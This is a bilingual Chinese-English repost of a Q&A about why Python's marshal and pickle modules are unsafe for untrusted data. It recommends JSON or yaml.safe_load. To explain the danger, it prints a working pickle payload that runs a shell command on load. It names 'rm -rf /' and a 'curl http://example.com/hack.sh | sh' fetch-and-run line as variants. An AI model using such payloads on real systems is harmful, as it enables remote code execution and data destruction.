元帅反序列化-不安全 [英] Marshal unserialization - not secure
问题描述
我在一个使用cPickle快速加载文件的项目中工作.几天前,我读到marshal甚至比cPickle还要快.它对我有用,但我很好奇,文档中的以下警告是什么:
I work on a project where I use cPickle to load files quickly. A couple of days ago I read that marshal can be even faster than cPickle. It works for me, but I'm curious, what is this warning from the documentation about:
警告
marshal模块的目的不是为了防止错误或恶意构造的数据.切勿对从不受信任或未经身份验证的来源收到的数据进行封送处理.
The marshal module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source.
如果我不小心怎么办?
推荐答案
元帅
没有已知的方法来利用marshal.实际执行代码时
使用marshal.loads()不是我能做的,然后看一下
marhal.c源代码,我没有看到直接明显的方法.
Marshal
There are no known ways to exploit marshal. Actually executing code when
using marshal.loads() is not something I was able to do, and looking at the
marhal.c source code, I don't see an immediately obvious way.
那么为什么在这里出现此警告? BDFL解释:
So why is this warning here? The BDFL explains:
封送警长的警告是合法的-解封封送数据的C代码 尚未针对缓冲区溢出等进行仔细分析.记住 有人第一次通过恶意JPEG闯入系统吗?相同 可能会与元帅发生.认真地.
BTW the warning for marshal is legit -- the C code that unpacks marshal data has not been carefully analyzed against buffer overflows and so on. Remember the first time someone broke into a system through a malicious JPEG? The same could happen with marshal. Seriously.
我建议您阅读其余的讨论;显示了一个错误 拆封数据会导致Python出现段错误;自Python以来此问题已修复 2.5(可能会滥用此错误来执行代码).其他错误可能 仍然存在!
I recommend you read the rest of the discussion; a bug is shown where unmarshaling data causes Python to segfault; this has been fixed since Python 2.5 (this bug could, potentially, be abused to execute code). Other bugs may still exist, though!
此外,marshal文档提到:
这不是通用的持久性"模块. [..]元帅模块存在 主要是为了支持读写Python的伪编译"代码 .pyc文件模块.
This is not a general "persistence" module. [..] The marshal module exists mainly to support reading and writing the "pseudo-compiled" code for Python modules of .pyc files.
因此,它甚至都不旨在以可靠的方式持久存储数据.
So it's not even designed to persist data in a reliable way.
您可以使用pickle轻松执行任意代码.例如:
You can easily execute arbitrary code with pickle. For example:
>>> import pickle
>>> pickle.loads(b"cos\nsystem\n(S'ls /'\ntR.")
bin data download home lib64 mnt proc run srv tmp usr var
boot dev etc lib lost+found opt root sbin sys ubuntu vagrant
0
这是无害的ls /,但也可能是无害的rm -rf /或
curl http://example.com/hack.sh | sh.
This was a harmless ls /, but could also be a less harmless rm -rf /, or a
curl http://example.com/hack.sh | sh.
您可以使用pickletools模块查看其工作原理:
You can see how this works by using the pickletools module:
>>> import pickletools
>>> pickletools.dis(b"cos\nsystem\n(S'ls /'\ntR.")
0: c GLOBAL 'os system'
11: ( MARK
12: S STRING 'ls /'
20: t TUPLE (MARK at 11)
21: R REDUCE
22: . STOP
pickle.py对这些操作码的含义有一些评论:
pickle.py has some comments on what these opcodes mean:
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
MARK = b'(' # push special markobject on stack
STRING = b'S' # push string; NL-terminated string argument
TUPLE = b't' # build tuple from topmost stack items
REDUCE = b'R' # apply callable to argtuple, both on stack
STOP = b'.' # every pickle ends with STOP
其中大部分是不言自明的;使用GLOBAL您可以获得任何功能,并且
用REDUCE调用它.
Most of it is self-explanatory; with GLOBAL you can get any function, and
with REDUCE you call it.
由于Python非常动态,因此您也可以使用它来猴子修补程序 在运行时.例如,您可以使用 您将密码上传到服务器的一个密码.
Since Python is pretty dynamic, you can also use this to monkey-patch a program
in run-time. For example, you could change the check_password function with
one where you upload the password to a server.
XML,json,MessagePack,ini文件或其他内容.这取决于 哪种格式最适合您的情况.
XML, json, MessagePack, ini files, or perhaps something else. It depends on which format is the best in your situation.
此代码是否经过仔细分析以防缓冲区溢出等"?谁 知道.大多数代码都没有,并且C使得做错事情变得容易. 1 甚至Python 代码可能容易受到攻击,因为它可能会调用用C实现的函数 易受攻击.
Has this code been "carefully analyzed against buffer overflows and so on"? Who knows. Most code hasn't, and C makes it easy to do things wrong.1 Even Python code may be vulnerable, as it may call functions implemented in C that are vulnerable.
Python的JSON模块出现问题.但同时
时间,它在面向公众的应用程序中使用了很多,因此可能是安全的.会的
肯定比marshal更安全,因为这仅是为.pyc文件设计的
并明确带有未经审核!"警告.
There have been problems with Python's JSON module. But at the same
time, it's used a lot in public-facing apps, so it's probably safe. It'll
certainly be safer than marshal, since this was only designed for .pyc files
and explicitly comes with a "not audited!" warning.
这当然不能保证.请记住, YAML安全几年前的洞 这导致世界上每个Ruby on Rails应用程序都容易受到攻击 任意代码执行.糟糕!这甚至不是一个微妙的缓冲 溢出,但这是一个更为明显的问题.
This is of course no guarantee. Remember that YAML security hole a few years back that caused every Ruby on Rails application in the world to be vulnerable to arbitrary code execution. Oops! And this wasn't even a subtle buffer overflow, but a much more obvious problem.
请注意,您不应不使用 yaml 的load()方法,因为具有
和Ruby的YAML一样的问题.请使用safe_load().
Note that you should not use yaml's load() method, as this has the
same problems as Ruby's YAML. Use safe_load() instead.
pickle模块中的警告是非常有必要的(可能应该是
表示更强),而marshal模块上方的警告似乎更多
警告类型的"此代码在设计时并未考虑安全性",但是
实际利用它并不是那么容易,而是依赖于假设的存在
在未知的错误上.不过,最好还是使用其他方法.
The warning in the pickle module is very much warranted (it should probably be
stated stronger), while the warning above the marshal module seems to be more
of a "this code was not designed with security in mind"-type of warning, but
actually exploiting it is not as easy, and relies on the hypothetical existence
on unknown bugs. Still, you're probably better off using something else.
1 对于开源项目,确实应该有一个仔细分析缓冲区溢出等等"的信任印章.是的,您可以花很多钱,并通过Veracode等来分析您的代码,但这对于开源项目是不可行的.在几年前以
1 There really ought to be a "carefully analyzed against buffer overflows and so on" seal of trust for open source projects. Yeah, you can shelf out the big bucks and get your code analyzed by Veracode and such, but this is not feasible for open source projects. There is some effort to do this after the OpenSSL Heartbleed clusterfuck a few years ago in the form of the Core Infrastructure Initiative, but its scope and budget are fairly limited (but it's fairly young, and may gain traction in a few years).
这篇关于元帅反序列化-不安全的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
